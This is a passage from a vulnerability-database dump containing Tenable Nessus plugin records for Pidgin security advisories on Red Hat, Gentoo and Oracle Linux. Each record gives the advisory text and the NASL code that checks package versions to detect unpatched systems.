changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.", "edition": 28, "published": "2009-08-20T00:00:00", "title": "RHEL 3 / 4 / 5 : pidgin (RHSA-2009:1218)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2009-08-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:pidgin-perl", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:libpurple", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:libpurple-perl", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:pidgin-devel", "p-cpe:/a:redhat:enterprise_linux:pidgin", "p-cpe:/a:redhat:enterprise_linux:finch-devel", "p-cpe:/a:redhat:enterprise_linux:libpurple-devel", "p-cpe:/a:redhat:enterprise_linux:finch", "p-cpe:/a:redhat:enterprise_linux:libpurple-tcl"], "id": "REDHAT-RHSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/nessus/40639", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1218. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40639);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : pidgin (RHSA-2009:1218)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-2694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1218\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1218\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:35", "description": "The remote host is affected by the vulnerability described in GLSA-200910-02\n(Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities were found in Pidgin:\n Yuriy\n Kaminskiy reported that the OSCAR protocol implementation in Pidgin\n misinterprets the ICQWebMessage message type as the ICQSMS message\n type, triggering an allocation of a large amount of memory\n (CVE-2009-1889).\n Federico Muttis of Core Security Technologies\n reported that the msn_slplink_process_msg() function in\n libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin\n doesn't properly process incoming SLP messages, triggering an overwrite\n of an arbitrary memory location (CVE-2009-2694). NOTE: This issue\n reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA\n 200905-07).\n bugdave reported that protocols/jabber/auth.c in\n libpurple as used in Pidgin does not follow the 'require TSL/SSL'\n preference when connecting to older Jabber servers that do not follow\n the XMPP specification, resulting in a connection to the server without\n the expected encryption (CVE-2009-3026).\n \nImpact :\n\n A remote attacker could send specially crafted SLP (via MSN) or ICQ web\n messages, possibly leading to execution of arbitrary code with the\n privileges of the user running Pidgin, unauthorized information\n disclosure, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 30, "published": "2009-10-23T00:00:00", "title": "GLSA-200910-02 : Pidgin: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "modified": "2009-10-23T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:pidgin"], "id": "GENTOO_GLSA-200910-02.NASL", "href": "https://www.tenable.com/plugins/nessus/42214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200910-02.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42214);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_bugtraq_id(35067, 35530, 36071);\n script_xref(name:\"GLSA\", value:\"200910-02\");\n\n script_name(english:\"GLSA-200910-02 : Pidgin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200910-02\n(Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities were found in Pidgin:\n Yuriy\n Kaminskiy reported that the OSCAR protocol implementation in Pidgin\n misinterprets the ICQWebMessage message type as the ICQSMS message\n type, triggering an allocation of a large amount of memory\n (CVE-2009-1889).\n Federico Muttis of Core Security Technologies\n reported that the msn_slplink_process_msg() function in\n libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin\n doesn't properly process incoming SLP messages, triggering an overwrite\n of an arbitrary memory location (CVE-2009-2694). NOTE: This issue\n reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA\n 200905-07).\n bugdave reported that protocols/jabber/auth.c in\n libpurple as used in Pidgin does not follow the 'require TSL/SSL'\n preference when connecting to older Jabber servers that do not follow\n the XMPP specification, resulting in a connection to the server without\n the expected encryption (CVE-2009-3026).\n \nImpact :\n\n A remote attacker could send specially crafted SLP (via MSN) or ICQ web\n messages, possibly leading to execution of arbitrary code with the\n privileges of the user running Pidgin, unauthorized information\n disclosure, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200905-07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200910-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pidgin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/pidgin-2.5.9-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/pidgin\", unaffected:make_list(\"ge 2.5.9-r1\"), vulnerable:make_list(\"lt 2.5.9-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pidgin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:32", "description": "From Red Hat Security Advisory 2009:1060 :\n\nUpdated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : pidgin (ELSA-2009-1060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373", "CVE-2009-2694"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:pidgin", "p-cpe:/a:oracle:linux:libpurple-devel", "p-cpe:/a:oracle:linux:finch", "p-cpe:/a:oracle:linux:pidgin-perl", "p-cpe:/a:oracle:linux:libpurple", "p-cpe:/a:oracle:linux:libpurple-tcl", "p-cpe:/a:oracle:linux:finch-devel", "p-cpe:/a:oracle:linux:libpurple-perl", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:pidgin-devel"], "id": "ORACLELINUX_ELSA-2009-1060.NASL", "href": "https://www.tenable.com/plugins/nessus/67863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1060 and \n# Oracle Linux Security Advisory ELSA-2009-1060 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67863);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2927\", \"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2009-2694\");\n script_bugtraq_id(35067);\n script_xref(name:\"RHSA\", value:\"2009:1060\");\n\n script_name(english:\"Oracle Linux 4 : pidgin (ELSA-2009-1060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1060 :\n\nUpdated pidgin packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file\ntransfers when using the Extensible Messaging and Presence Protocol\n(XMPP). If a Pidgin client initiates a file transfer, and the remote\ntarget sends a malformed response, it could cause Pidgin to crash or,\npotentially, execute arbitrary code with the permissions of the user\nrunning Pidgin. This flaw only affects accounts using XMPP, such as\nJabber and Google Talk. (CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data\ncan be overwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is\nexpanded. If the buffer is full when more data arrives, the data\nstored in this buffer becomes corrupted. This corrupted data could\nresult in confusing or misleading data being presented to the user, or\npossibly crash Pidgin. (CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security\nAdvisory RHSA-2008:0584 provided an incomplete fix for the integer\noverflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin\nclient receives a specially crafted MSN message, it may be possible to\nexecute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy\nlist can send you messages. This prevents arbitrary MSN users from\nexploiting this flaw.\n\nAll Pidgin users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Pidgin must be\nrestarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-May/001018.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"finch-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"finch-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-perl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-tcl-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-devel-2.5.5-2.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-perl-2.5.5-2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 